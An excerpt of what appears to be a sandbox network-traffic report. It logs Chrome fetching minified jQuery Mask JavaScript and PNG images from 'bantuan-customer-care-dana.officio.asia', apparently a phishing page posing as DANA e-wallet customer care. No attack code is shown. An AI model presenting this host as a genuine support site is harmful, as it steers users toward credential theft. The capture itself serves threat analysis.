                                                  CF-RAY: 8d21132f9fb00f46-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-13 17:33:28 UTC675INData Raw: 76 61 72 20 24 6a 73 63 6f 6d 70 3d 7b 73 63 6f 70 65 3a 7b 7d 2c 66 69 6e 64 49 6e 74 65 72 6e 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 6c 2c 64 29 7b 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 28 61 3d 53 74 72 69 6e 67 28 61 29 29 3b 66 6f 72 28 76 61 72 20 70 3d 61 2e 6c 65 6e 67 74 68 2c 68 3d 30 3b 68 3c 70 3b 68 2b 2b 29 7b 76 61 72 20 62 3d 61 5b 68 5d 3b 69 66 28 6c 2e 63 61 6c 6c 28 64 2c 62 2c 68 2c 61 29 29 72 65 74 75 72 6e 7b 69 3a 68 2c 76 3a 62 7d 7d 72 65 74 75 72 6e 7b 69 3a 2d 31 2c 76 3a 76 6f 69 64 20 30 7d 7d 7d 3b 24 6a 73 63 6f 6d 70 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3f 4f
                                                  Data Ascii: var $jscomp={scope:{},findInternal:function(a,l,d){a instanceof String&&(a=String(a));for(var p=a.length,h=0;h<p;h++){var b=a[h];if(l.call(d,b,h,a))return{i:h,v:b}}return{i:-1,v:void 0}}};$jscomp.defineProperty="function"==typeof Object.defineProperties?O
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 70 3d 30 3b 70 3c 61 2e 6c 65 6e 67 74 68 2d 31 3b 70 2b 2b 29 7b 76 61 72 20 68 3d 61 5b 70 5d 3b 68 20 69 6e 20 64 7c 7c 28 64 5b 68 5d 3d 7b 7d 29 3b 64 3d 64 5b 68 5d 7d 61 3d 61 5b 61 2e 6c 65 6e 67 74 68 2d 31 5d 3b 70 3d 64 5b 61 5d 3b 6c 3d 6c 28 70 29 3b 6c 21 3d 70 26 26 6e 75 6c 6c 21 3d 6c 26 26 24 6a 73 63 6f 6d 70 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 64 2c 61 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 6c 7d 29 7d 7d 3b 0a 24 6a 73 63 6f 6d 70 2e 70 6f 6c 79 66 69 6c 6c 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6e 64 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 64 29 7b 72 65 74 75 72 6e
                                                  Data Ascii: p=0;p<a.length-1;p++){var h=a[p];h in d||(d[h]={});d=d[h]}a=a[a.length-1];p=d[a];l=l(p);l!=p&&null!=l&&$jscomp.defineProperty(d,a,{configurable:!0,writable:!0,value:l})}};$jscomp.polyfill("Array.prototype.find",function(a){return a?a:function(a,d){return
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 6d 61 73 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 62 2e 64 61 74 61 28 22 63 68 61 6e 67 65 64 22 2c 21 30 29 7d 29 2e 6f 6e 28 22 62 6c 75 72 2e 6d 61 73 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 64 3d 3d 3d 63 2e 76 61 6c 28 29 7c 7c 62 2e 64 61 74 61 28 22 63 68 61 6e 67 65 64 22 29 7c 7c 62 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 3b 62 2e 64 61 74 61 28 22 63 68 61 6e 67 65 64 22 2c 21 31 29 7d 29 2e 6f 6e 28 22 62 6c 75 72 2e 6d 61 73 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 64 3d 63 2e 76 61 6c 28 29 7d 29 2e 6f 6e 28 22 66 6f 63 75 73 2e 6d 61 73 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 21 30 3d 3d 3d 66 2e 73 65 6c 65 63 74 4f 6e 46 6f 63 75 73 26 26 61 28 62 2e 74 61 72 67 65 74 29 2e 73 65 6c 65 63 74 28 29 7d 29 2e 6f 6e 28
                                                  Data Ascii: mask",function(){b.data("changed",!0)}).on("blur.mask",function(){d===c.val()||b.data("changed")||b.trigger("change");b.data("changed",!1)}).on("blur.mask",function(){d=c.val()}).on("focus.mask",function(b){!0===f.selectOnFocus&&a(b.target).select()}).on(
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 2e 6d 61 73 6b 44 69 67 69 74 50 6f 73 4d 61 70 4f 6c 64 5b 6b 5d 26 26 6c 2b 2b 3b 67 3e 64 3f 67 3d 31 30 2a 65 3a 66 3e 3d 67 26 26 66 21 3d 3d 64 3f 63 2e 6d 61 73 6b 44 69 67 69 74 50 6f 73 4d 61 70 4f 6c 64 5b 67 5d 7c 7c 28 66 3d 67 2c 67 3d 67 2d 28 6c 2d 68 29 2d 61 2c 63 2e 6d 61 73 6b 44 69 67 69 74 50 6f 73 4d 61 70 5b 67 5d 26 26 28 67 3d 66 29 29 3a 67 3e 66 26 26 0a 28 67 3d 67 2b 28 68 2d 6c 29 2b 6d 29 7d 72 65 74 75 72 6e 20 67 7d 2c 62 65 68 61 76 69 6f 75 72 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 66 3d 66 7c 7c 77 69 6e 64 6f 77 2e 65 76 65 6e 74 3b 63 2e 69 6e 76 61 6c 69 64 3d 5b 5d 3b 76 61 72 20 65 3d 62 2e 64 61 74 61 28 22 6d 61 73 6b 2d 6b 65 79 63 6f 64 65 22 29 3b 69 66 28 2d 31 3d 3d 3d 61 2e 69 6e 41 72 72 61 79 28 65 2c 6d
                                                  Data Ascii: .maskDigitPosMapOld[k]&&l++;g>d?g=10*e:f>=g&&f!==d?c.maskDigitPosMapOld[g]||(f=g,g=g-(l-h)-a,c.maskDigitPosMap[g]&&(g=f)):g>f&&(g=g+(h-l)+m)}return g},behaviour:function(f){f=f||window.event;c.invalid=[];var e=b.data("mask-keycode");if(-1===a.inArray(e,m
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 70 6c 79 28 74 68 69 73 2c 63 29 7d 3b 71 28 22 6f 6e 43 68 61 6e 67 65 22 2c 21 30 3d 3d 3d 67 2c 6d 29 3b 71 28 22 6f 6e 4b 65 79 50 72 65 73 73 22 2c 21 30 3d 3d 3d 67 2c 6d 29 3b 71 28 22 6f 6e 43 6f 6d 70 6c 65 74 65 22 2c 68 2e 6c 65 6e 67 74 68 3d 3d 3d 65 2e 6c 65 6e 67 74 68 2c 6d 29 3b 71 28 22 6f 6e 49 6e 76 61 6c 69 64 22 2c 30 3c 63 2e 69 6e 76 61 6c 69 64 2e 6c 65 6e 67 74 68 2c 5b 68 2c 61 2c 62 2c 63 2e 69 6e 76 61 6c 69 64 2c 66 5d 29 7d 7d 3b 62 3d 61 28 62 29 3b 76 61 72 20 6d 3d 74 68 69 73 2c 64 3d 63 2e 76 61 6c 28 29 2c 68 3b 65 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 65 3f 65 28 63 2e 76 61 6c 28 29 2c 76 6f 69 64 20 30 2c 62 2c 66 29 3a 65 3b 6d 2e 6d 61 73 6b 3d 65 3b 6d 2e 6f 70 74 69 6f 6e 73 3d 66 3b 6d
                                                  Data Ascii: ply(this,c)};q("onChange",!0===g,m);q("onKeyPress",!0===g,m);q("onComplete",h.length===e.length,m);q("onInvalid",0<c.invalid.length,[h,a,b,c.invalid,f])}};b=a(b);var m=this,d=c.val(),h;e="function"===typeof e?e(c.val(),void 0,b,f):e;m.mask=e;m.options=f;m
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 74 69 6f 6e 28 62 2c 65 2c 66 29 7b 66 3d 66 7c 7c 7b 7d 3b 76 61 72 20 63 3d 61 28 62 29 2e 64 61 74 61 28 22 6d 61 73 6b 22 29 2c 64 3d 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 3b 62 3d 61 28 62 29 2e 76 61 6c 28 29 7c 7c 61 28 62 29 2e 74 65 78 74 28 29 3b 74 72 79 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 65 3d 65 28 62 29 29 2c 22 6f 62 6a 65 63 74 22 21 3d 3d 74 79 70 65 6f 66 20 63 7c 7c 64 28 63 2e 6f 70 74 69 6f 6e 73 29 21 3d 3d 64 28 66 29 7c 7c 63 2e 6d 61 73 6b 21 3d 3d 65 7d 63 61 74 63 68 28 74 29 7b 7d 7d 2c 68 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 2c 64 3b 61 3d 22 6f 6e 22 2b 61 3b
                                                  Data Ascii: tion(b,e,f){f=f||{};var c=a(b).data("mask"),d=JSON.stringify;b=a(b).val()||a(b).text();try{return"function"===typeof e&&(e=e(b)),"object"!==typeof c||d(c.options)!==d(f)||c.mask!==e}catch(t){}},h=function(a){var b=document.createElement("div"),d;a="on"+a;
                                                  2024-10-13 17:33:28 UTC400INData Raw: 31 37 2c 31 38 2c 33 36 2c 33 37 2c 33 38 2c 33 39 2c 34 30 2c 39 31 5d 2c 74 72 61 6e 73 6c 61 74 69 6f 6e 3a 7b 30 3a 7b 70 61 74 74 65 72 6e 3a 2f 5c 64 2f 7d 2c 39 3a 7b 70 61 74 74 65 72 6e 3a 2f 5c 64 2f 2c 6f 70 74 69 6f 6e 61 6c 3a 21 30 7d 2c 22 23 22 3a 7b 70 61 74 74 65 72 6e 3a 2f 5c 64 2f 2c 72 65 63 75 72 73 69 76 65 3a 21 30 7d 2c 41 3a 7b 70 61 74 74 65 72 6e 3a 2f 5b 61 2d 7a 41 2d 5a 30 2d 39 5d 2f 7d 2c 0a 53 3a 7b 70 61 74 74 65 72 6e 3a 2f 5b 61 2d 7a 41 2d 5a 5d 2f 7d 7d 7d 3b 61 2e 6a 4d 61 73 6b 47 6c 6f 62 61 6c 73 3d 61 2e 6a 4d 61 73 6b 47 6c 6f 62 61 6c 73 7c 7c 7b 7d 3b 68 3d 61 2e 6a 4d 61 73 6b 47 6c 6f 62 61 6c 73 3d 61 2e 65 78 74 65 6e 64 28 21 30 2c 7b 7d 2c 68 2c 61 2e 6a 4d 61 73 6b 47 6c 6f 62 61 6c 73 29 3b 68 2e 64
                                                  Data Ascii: 17,18,36,37,38,39,40,91],translation:{0:{pattern:/\d/},9:{pattern:/\d/,optional:!0},"#":{pattern:/\d/,recursive:!0},A:{pattern:/[a-zA-Z0-9]/},S:{pattern:/[a-zA-Z]/}}};a.jMaskGlobals=a.jMaskGlobals||{};h=a.jMaskGlobals=a.extend(!0,{},h,a.jMaskGlobals);h.d


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  20192.168.2.449776104.21.61.834435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:28 UTC382OUTGET /ast/img/load_bg.png HTTP/1.1
                                                  Host: bantuan-customer-care-dana.officio.asia
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:28 UTC694INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:33:28 GMT
                                                  Content-Type: image/png
                                                  Content-Length: 7863
                                                  Connection: close
                                                  Last-Modified: Mon, 12 Jun 2023 16:23:04 GMT
                                                  Cache-Control: max-age=14400
                                                  CF-Cache-Status: HIT
                                                  Age: 7075
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=INb5NYnjdRKkI6SQghmnSL%2F5F%2Bz4CSUEZ0%2FaIyec%2BgTCaldZoqiPBxSvbJmMWgApHL1nAMfy1YyFoFfwpwfsK3XBF62tRdv%2ByMQZ322fQC3Ws6uun7NbydFhrcgoJclFEpcsEgnRQEgV0PSMF9v1VQWYeFQVZlrCt1k%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8d21132fbac9432e-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-13 17:33:28 UTC675INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 01 2c 08 04 00 00 00 d3 74 46 fe 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 02 62 4b 47 44 00 ff 87 8f cc bf 00 00 00 07 74 49 4d 45 07 e6 0b 01 06 0c 01 1c 9a 07 63 00 00 1d 8b 49 44 41 54 78 da ed 9d d9 6f 64 47 76 a7 bf 73 6f 6e cc 4c 92 c9 2d b9 6f b5 48 55 25 95 aa 54 da bb 5b 52 6b 6d 61 ba a7 0d 5b f0 8b fb c1 f0 c3 3c ce f2 34 c0 60 80 99 bf c0 2f f3 34 b0 81 01 c6 30 da 63 f7 00 83 6e 60 ec 1e 49 2d 95 dd b2 d4 56 ab a4 5a 54 7b 15 c9 e2 be 6f c9 25 d7 1b f3 90 cc 22 8b 64 92 99 cc e5 de cb 8c 8f 28 56 ee 8c 88 fc dd 13 27 4e 9c 88 10 34
                                                  Data Ascii: PNGIHDR,,tFgAMAa cHRMz&u0`:pQ<bKGDtIMEcIDATxodGvsonL-oHU%T[Rkma[<4`/40cn`I-VZT{o%"d(V'N4
                                                  2024-10-13 17:33:28 UTC1369INData Raw: a4 9e ac a5 90 64 91 5b dc 63 ce 7d b5 74 9b b0 7c 74 72 8e 13 34 21 ee 6b ec 23 20 28 96 19 e2 26 53 ee ea 18 dd 24 ac 3a 06 39 cb 00 41 8e 87 3f 55 28 02 6c 30 c2 6d 46 d8 b0 bb 30 c5 14 da 0d 04 38 c1 73 f4 e1 af 29 49 ed 44 48 30 c6 35 86 dc 11 ad 77 83 b0 02 0c 72 91 9e 1d b3 7c b5 4a 56 5c 57 19 76 be b8 9c 2e 2c 3f 27 b8 48 1f 3e 6a ab fb cb 87 00 49 46 b9 ca 10 09 bb 0b 73 58 41 9d 8a 49 3f 2f 30 58 c3 dd 5f 3e 84 24 c3 7c cd 23 e7 46 e9 9d 2a 2c a1 83 4b 3c 4d 48 8b 2a 0f c2 3a 77 f9 96 29 67 b6 90 33 85 d5 c4 79 ce d3 8c ee fe 0e 42 80 25 6e 70 83 45 bb 8b b2 7f e1 9c 85 9f 67 b8 44 3b 86 16 55 01 08 16 b3 7c c3 77 4e f3 b8 9c 25 2c a1 87 57 39 89 57 8b aa 08 84 14 c3 7c c1 b8 93 5a cd b4 bb 00 3b 08 f3 12 6f d3 83 61 77 41 5c 87 41 1b 83 78 59
                                                  Data Ascii: d[c}t|tr4!k# (&S$:9A?U(l0mF08s)IDH05wr|JV\Wv.,?'H>jIFsXAI?/0X_>$|#F*,K<MH*:w)g3yB%npEgD;U|wN%,W9W|Z;oawA\AxY
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 70 90 b0 da 0b 89 57 68 6a 96 41 3a f2 3f 99 5f 58 c2 39 bd 59 ad 26 2f 8a 30 67 f3 e7 3a e4 17 56 13 a7 ec 2e bb c6 e1 9c a2 25 df 53 f9 85 f5 34 cd da 5e 69 0e 40 d1 cc e9 7c 4f e6 13 56 58 9f df a5 39 14 e1 59 ea f7 7f 2a 9f 78 fa f5 ae ed 9a 43 51 b4 e4 0b 3a ec 2f 2c 0f a7 0b 49 8d d0 d4 3c 3e 9e da 3f e8 b0 bf b0 da f4 44 8e a6 20 14 7d b4 ee f7 c4 fe c2 1a d4 89 7d 9a 82 50 84 f7 df d7 61 3f 61 d5 71 4a 2f 9c d0 14 88 c1 29 82 fb 3d bc 97 1e a2 da 5e 69 0a 44 11 dd 6f f1 bd b1 cf 23 83 7a 86 50 53 30 8a 00 27 f6 f6 70 7b 85 15 2e 7e 2f 24 4d 8d 33 b8 77 93 a3 bd c2 ea a6 51 db 2b 4d 11 28 1a f6 1e 2a b8 57 58 83 3a 15 59 53 24 7e 06 77 4f 47 ef 16 56 44 6f 54 a4 29 1a 45 cf ee ed 42 76 0b ab 4d 2f a5 2f 1d 41 1e 5f c0 3b 6f 03 6a eb c7 7a fc a3 72
                                                  Data Ascii: pWhjA:?_X9Y&/0g:V.%S4^i@|OVX9Y*xCQ:/,I<>?D }}Pa?aqJ/)=^iDo#zPS0'p{.~/$M3wQ+M(*WX:YS$~wOGVDoT)EBvM//A_;ojzr
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 6c a6 54 ec c0 2b db c0 67 88 4a 58 75 46 a7 bf d1 33 18 fe 51 ff b3 5d a7 fb 1a 1a 9c d6 f1 ed d7 0a 8e a7 1b df b6 b0 4c 1c 69 f8 77 b2 d5 c9 ed 23 17 d3 8c 46 a3 d1 57 9e fb d9 dc 8d 91 6f 26 ae 2d 4c c7 c7 36 36 32 29 6b 5f ef 4b 00 0c 39 19 3c 15 6e 0f 3c df 7e a6 a3 ab a5 b5 29 14 2e e7 d4 71 a5 5b c1 e1 04 b3 19 7d 59 61 85 9c be a4 5e 10 51 ca 73 40 52 b8 cf d7 d3 dd d3 fd 4e 72 7d 7d 25 36 34 35 bc 30 15 1b 5a 9d de 5c 48 26 ad 0c 4a 29 25 e2 91 16 df 33 91 68 b0 de d7 54 77 69 30 da 1c ac 0b 04 dc 22 a8 9d 2d e1 70 4c 42 ac e4 84 d5 4f c0 d9 17 43 b6 0b f4 1f 9a 89 e9 f3 f9 7c 4d 4d 03 7d 4a 59 56 22 b1 b6 be 19 cf 58 64 87 7b 62 48 c0 df 14 f1 78 0c c3 fe 88 54 09 2d 61 77 01 0e 46 e1 a7 97 c9 9c b0 9a f1 38 79 4c 98 a3 f0 46 15 31 cd 60 d0 99
                                                  Data Ascii: lT+gJXuF3Q]Liw#FWo&-L662)k_K9<n<~).q[}Ya^Qs@RNr}}%6450Z\H&J)%3hTwi0"-pLBOC|MM}JYV"Xd{bHxT-awF8yLF1`
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 54 24 62 6f 49 92 c9 99 b9 db 8f 7e 37 fa d1 e4 b5 d5 b5 8c a0 10 16 52 b9 05 6a aa 6c 7b 78 29 12 5b d6 59 18 4f fc d7 9b 7f fb e8 67 83 cd 75 7f 79 67 c3 51 36 7b 4f a1 67 73 a1 76 cf e3 87 a6 9c bd d4 3e a3 e0 d6 fa af ae 9f ee 7f d2 9d ad 1e f1 f8 fc c2 d0 d4 af ef 7e 39 fb c5 52 72 2b c4 a9 78 bc 3f ea d6 ab ca 6f f4 b3 9f 78 2b f6 9f af e3 f4 65 70 16 93 b9 06 d8 76 d8 17 48 e0 88 6e 66 7f 44 40 a9 ff 7e af f3 b3 3f fe 41 63 63 75 ff 76 22 be bc 7a 63 e8 f2 d0 c7 93 0f 37 92 96 df b0 65 2b 50 67 4b 2a 4b 92 85 dc cd 6d 61 c5 58 a4 db a9 5e 96 a0 94 29 16 33 a9 ff 74 e5 fe e2 9f be f2 f4 09 b3 2a 63 d8 74 7a 79 f9 de e8 df df f9 7c e6 de fa 62 aa d9 5b 67 24 ac 75 2b a3 1c ed 8e da 85 b0 44 6c fb ce f6 ad 7f c5 25 e7 b6 57 ae a0 86 28 75 26 f4 1f ce
                                                  Data Ascii: T$boI~7Rjl{x)[YOguygQ6{Ogsv>~9Rr+x?ox+epvHnfD@~?Accuv"zc7e+PgK*KmaX^)3t*ctzy|b[g$u+Dl%W(u&
                                                  2024-10-13 17:33:28 UTC1369INData Raw: ca 27 06 6a 6c 43 98 e4 53 36 8a 7d db 51 4e fb 8a b3 c9 00 05 1d 2c a2 71 39 c2 06 9f ee b7 ff d5 61 1c ed 18 b9 65 bc f4 68 27 be 06 b0 f8 8a 6f 8f b2 d9 c2 d1 84 a5 98 27 4a 8b dd b5 d6 54 18 61 88 cf 8e 96 9a 7e d4 83 2f 53 ac 30 40 9d dd 35 d7 54 10 61 85 8f 99 3f da 9b 8f 7e a2 6a 0c 45 9f 5b 4e 64 d5 1c 81 14 ff 7c f4 3c bc 52 84 31 4f 88 0e ed 69 1d 53 14 37 f8 82 f4 51 df 5e 8a b0 32 cc d3 4e 93 dd 2d a0 a9 00 c2 28 9f ec dd bd bd 70 4a eb ca e2 2c d3 af 3d ad 63 87 b0 c4 47 c5 c6 da 9f a4 54 1f 69 85 38 fd ee 3c 95 55 93 07 61 93 cf b8 5b da 87 94 ee 7c 2f e0 a5 cb 8d 67 1c 6a f2 60 f1 15 5f 97 ba d3 7f e9 c2 b2 98 a5 89 36 bb 5b 43 53 36 ee f0 8f a5 6f ab 50 8e 70 41 8a 39 a2 44 ec 6e 0f 4d 19 10 c6 f8 98 95 d2 3f a8 3c 71 a8 0d 16 e8 26 6c 73
                                                  Data Ascii: 'jlCS6}QN,q9aeh'o'JTa~/S0@5Ta?~jE[Nd|<R1OiS7Q^2N-(pJ,=cGTi8<Ua[|/gj`_6[CS6oPpA9DnM?<q&ls
                                                  2024-10-13 17:33:28 UTC343INData Raw: 23 78 a8 27 4a 84 08 dd 84 31 f1 e3 dd b2 62 e5 96 98 6c 59 a7 14 09 2c 62 4c b0 cc 32 73 ac 92 3e ae 16 6a 6f 13 d4 1e 26 7e 3c d4 d1 43 1b 1e 1a 68 21 88 81 60 20 8f db 43 ed f8 9d 1f d9 f1 9b 2d 89 5a 58 6c 32 cf 2a 69 e6 19 67 83 34 09 32 76 57 ba da d4 a2 b0 9e 24 40 3d 3e 0c 42 74 d0 8c 0f 0f 1e 7c f8 f0 e2 c1 44 60 4b 6e d9 df 59 eb 96 fb 9d 21 4d 8a 24 49 d2 a4 49 b2 c8 34 eb 58 24 89 b9 23 07 a1 72 68 61 ed 24 2b 1e 0f 75 84 a8 c3 8f 67 87 25 db 16 56 d6 2e 29 2c d2 24 d9 60 9d 4d d2 e0 c0 d1 a7 8d fc 7f 14 8e 09 88 65 e1 68 00 00 00 00 25 74 45 58 74 64 61 74 65 3a 63 72 65 61 74 65 00 32 30 32 32 2d 31 30 2d 33 30 54 31 38 3a 31 33 3a 33 39 2b 30 30 3a 30 30 e2 93 db 58 00 00 00 25 74 45 58 74 64 61 74 65 3a 6d 6f 64 69 66 79 00 32 30 32 32 2d
                                                  Data Ascii: #x'J1blY,bL2s>jo&~<Ch!` C-ZXl2*ig42vW$@=>Bt|D`KnY!M$II4X$#rha$+ug%V.),$`Meh%tEXtdate:create2022-10-30T18:13:39+00:00X%tEXtdate:modify2022-


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  21192.168.2.449778104.21.61.834435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:28 UTC378OUTGET /ast/img/kom.png HTTP/1.1
                                                  Host: bantuan-customer-care-dana.officio.asia
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:28 UTC690INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:33:28 GMT
                                                  Content-Type: image/png
                                                  Content-Length: 8484
                                                  Connection: close
                                                  Last-Modified: Mon, 12 Jun 2023 16:23:08 GMT
                                                  Cache-Control: max-age=14400
                                                  CF-Cache-Status: HIT
                                                  Age: 7077
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c1NcN1nS8Zz%2FEuL0JXvKsKAa3JgUMa7UzO5c57BMQpRMIgTSQOFybKiNFylNN9SbHlF1z14hrrqyeyU1oHgN9N9mnamiAm1hqndcYNMOORIZF9WzzxHX3PXSGZ6%2BmzxWTZndajiWNN1NyeIKhMQ0ZF9W36%2BnW2ZR3iA%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8d21132fbfea7c82-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-13 17:33:28 UTC679INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 c8 08 06 00 00 00 ad 58 ae 9e 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 20 00 49 44 41 54 78 9c ed 9d 7b 94 25 75 75 ef bf bb ce e9 ee e9 79 0f c3 0c 6f e4 29 32 0a 0c 90 0b 78 81 18 41 34 e2 03 44 63 f0 c9 12 8d 88 57 4d 94 45 ae 17 91 c7 8d 9a 64 2d f5 e6 1a 0d 6a 6e 1e be a2 4c 04 d4 28 48 40 c6 84 a0 04 26 f2 90 19 90 01 5a 18 98 07 c3 34 dd 3d fd 3e 55 fb 7b ff a8 aa 9e 5f 57 57 9d 53 75 4e 9d 53 75 ba 7f 9f b5 66 cd e9 aa df 63 d7 af 7e bb 7e ef bd 01 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b 65 41 23 45 0b b0 10 98 98 98 38
                                                  Data Ascii: PNGIHDRXsRGBsBIT|d IDATx{%uuyo)2xA4DcWMEd-jnL(H@&Z4=>U{_WWSuNSufc~~bX,bX,bX,bX,bX,bX,bX,eA#E8
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 44 a7 98 d7 0a 42 f2 61 00 27 14 2d 47 87 d9 05 60 33 80 5f 01 78 04 c0 4e 00 3b 26 26 26 f6 f4 f7 f7 bb a3 a3 a3 ba 74 e9 52 17 7e ef c1 01 50 05 b0 1c c0 1a 00 07 03 38 4a 55 4f 76 1c e7 65 00 8e 03 d0 17 93 c7 dd 22 f2 bb 1d 78 96 c2 99 b7 0a 42 f2 09 00 47 17 2d 47 bb 20 79 af 88 7c 79 64 64 e4 b6 e5 cb 97 bf d8 ee 99 a6 60 f6 6f 99 eb ba a7 57 ab d5 f7 01 38 4c 44 e6 7d cb 3c 2f 15 84 e4 83 00 4e 2a 5a 8e 9c 20 80 29 00 37 00 f8 8c 88 0c 16 2c cf 82 a2 5a b4 00 79 43 f2 6e 74 bf 72 78 00 ee 86 7f 86 e3 99 a2 85 59 c8 cc 2b 05 f1 3c ef 5a 00 67 15 2d 47 93 28 7c c3 0c ef 11 91 bd ed c8 80 a4 6c d9 b2 a5 67 dd ba 75 7d ae eb 9e 5a ad 56 d7 03 78 05 80 15 24 fb 01 88 88 8c 02 18 05 b0 b9 56 ab dd d5 d3 d3 b3 15 c0 84 88 68 3b 64 b2 74 08 92 67 b6 f9 18
                                                  Data Ascii: DBa'-G`3_xN;&&&tR~P8JUOve"xBG-G y|ydd`oW8LD}</N*Z )7,ZyCntrxY+<Zg-G(|lgu}ZVx$Vh;dtg
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 7b 57 43 f2 90 fc ea d0 0c 89 de 91 54 75 a8 0d f9 b5 83 49 92 df 20 f9 12 96 74 37 2c c9 8a eb ba e7 93 7c 80 e9 15 a6 d4 5b df cb d8 c5 3a a2 0d 69 fe 49 dc 45 92 5f 11 91 32 1b 56 98 04 f0 01 f8 5d a3 45 22 72 89 88 3c dd 6e 8f b6 cd 22 22 5e b5 5a bd 55 44 4e 0e ba 6e cb 01 dc de 20 da 61 1d 10 6d fe e0 79 de c7 73 fe f2 c6 f6 9b 49 2e ca 39 9f bc 50 55 fd 01 bb 60 11 2d 0b 24 cf a3 ef 59 2b ca 7b 8b 96 ad 1e a5 3b 72 eb 38 4e ae 1e 6a 3d cf 8b 9d 6b 27 39 58 b2 9d 0e 04 f0 5e 11 f9 76 db 32 f0 7d 21 1e 04 e0 40 00 6b e1 9b 25 12 00 a3 9e e7 ed ad 54 2a db e1 fb 34 79 2e 6f a7 9d 22 72 07 80 aa eb ba 6f ae 54 2a 3f 08 f2 85 aa 1e 99 67 3e f3 1e 55 fd 59 9e 5f e3 b8 3c 48 fe 51 8e 79 b4 84 aa 92 64 6e 5e 99 e8 8f e1 fe 4c 55 1f 21 39 e1 67 d1 f4 1c 84
